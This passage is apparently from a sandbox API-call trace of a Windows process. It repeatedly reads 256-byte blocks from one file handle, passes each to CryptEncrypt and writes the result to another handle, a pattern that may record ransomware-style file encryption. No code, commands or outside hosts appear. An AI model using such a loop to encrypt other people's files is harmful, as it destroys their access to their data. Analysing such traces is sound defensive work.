lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.098] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.098] GetLastError () returned 0x0 [0149.098] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.100] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.100] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.100] GetLastError () returned 0x0 [0149.100] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.100] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.100] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.100] GetLastError () returned 0x0 [0149.100] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.100] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.100] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.100] GetLastError () returned 0x0 [0149.100] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.100] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.100] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.100] GetLastError () returned 0x0 [0149.100] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.100] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.100] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.100] GetLastError () returned 0x0 [0149.100] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.100] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.100] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.100] GetLastError () returned 0x0 [0149.100] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.101] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.101] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.101] GetLastError () returned 0x0 [0149.101] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.101] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.101] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.101] GetLastError () returned 0x0 [0149.101] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.101] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.101] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.101] GetLastError () returned 0x0 [0149.101] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.101] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.101] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.101] GetLastError () returned 0x0 [0149.101] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.101] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.101] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.101] GetLastError () returned 0x0 [0149.101] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.101] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.102] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.102] GetLastError () returned 0x0 [0149.102] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.102] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.102] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.102] GetLastError () returned 0x0 [0149.103] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.103] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.103] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.103] GetLastError () returned 0x0 [0149.103] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.103] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.103] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.103] GetLastError () returned 0x0 [0149.103] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.103] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.244] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.244] GetLastError () returned 0x0 [0149.244] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.244] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.244] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.244] GetLastError () returned 0x0 [0149.244] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.244] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.244] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.244] GetLastError () returned 0x0 [0149.244] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.244] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.244] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.244] GetLastError () returned 0x0 [0149.244] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.244] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.244] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.244] GetLastError () returned 0x0 [0149.244] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.244] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.244] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.244] GetLastError () returned 0x0 [0149.245] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.245] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.245] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.245] GetLastError () returned 0x0 [0149.245] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.245] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.245] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.245] GetLastError () returned 0x0 [0149.245] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.245] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.245] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.245] GetLastError () returned 0x0 [0149.245] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.245] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.245] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.245] GetLastError () returned 0x0 [0149.245] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.245] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.245] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.245] GetLastError () returned 0x0 [0149.245] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.245] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.245] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.245] GetLastError () returned 0x0 [0149.245] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.245] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.246] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.246] GetLastError () returned 0x0 [0149.246] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.246] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.246] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.246] GetLastError () returned 0x0 [0149.246] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.246] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.246] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.246] GetLastError () returned 0x0 [0149.246] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.246] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.246] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.246] GetLastError () returned 0x0 [0149.246] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.246] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, 